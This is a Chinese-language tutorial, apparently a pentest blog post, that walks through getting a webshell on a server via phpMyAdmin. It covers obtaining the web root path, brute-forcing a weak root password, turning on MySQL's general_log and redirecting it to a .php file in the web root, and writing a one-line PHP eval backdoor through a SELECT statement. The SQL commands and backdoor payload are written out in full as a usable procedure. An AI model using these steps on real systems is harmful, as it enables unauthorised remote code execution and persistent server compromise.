phpMyAdmin簡介

phpMyAdmin 是眾多MySQL圖形化管理工具中使用最為廣泛的一種，是一款使用PHP 開發的基于B/S模式的MySQL客戶端軟件，該工具是基于 Web 跨平臺的管理程序，并且支持簡體中文，用戶可以在官網上下載最新版本的。

GetSHELL前提

1、phpMyAdmin利用日志文件GetSHELL前提賬號必須有可讀可寫權限

2、MySQL版本大于5.0，MySQL 5.0版本以上會創建日志文件，我們通過修改日志文件的全局變量，就可以GetSHELL

3、滿足上方兩個條件，還需要知道網站的絕對路徑,對于網站的絕對路徑查找有很多方法，在我上一篇文章里有講解到：傳送門

GetSHELL過程

這邊是通過php探針獲取到了網站的絕對路徑:C:/phpStudy/WWW

接著是通過弱口令爆破來得到了phpMyAdmin的登陸賬號密碼:root

進入到phpMyAdmin管理頁面后，得到一些關鍵信息：

• 數據庫服務器:

服務器: localhost via TCP/IP
軟件: MySQL
軟件版本: 5.5.40 - MySQL Community Server (GPL)
協議版本: 10
用戶: root@localhost
服務器字符集: UTF-8 Unicode (utf8)

• 網站服務器

Apache/2.4.10 (Win32) OpenSSL/0.9.8zb PHP/5.2.17
數據庫客戶端版本: libmysql - 5.0.51a
PHP 擴展: mysqli 文檔

得知MySQL的版本是大于5.0，那么應該可以通過日志寫入shell

查看日志的信息

show variables like '%general%';

日志讀寫默認是關閉的OFF,然后我們打開日志讀寫功能：

打開general_log日志讀寫功能
SET GLOBAL general_log='on'

創建文件

由于之前我們通過php探針得到了網站的絕對路徑，然后我們就可以寫入shell.php到網站的根目錄下：

SET GLOBAL general_log_file='C:/phpStudy/WWW/shell.php'

這個時候，對應的路徑下就會生成一個shell.php腳本文件：

寫入一句話到shell.php

PHP一句話木馬：

1
<?php @eval($_POST[liuwx]);?>

寫入一句話語句：

1
SELECT '<?php @eval($_POST[liuwx]);?>'

這個時候就成功寫入一句話到了shell.php里：

成功GetSHELL: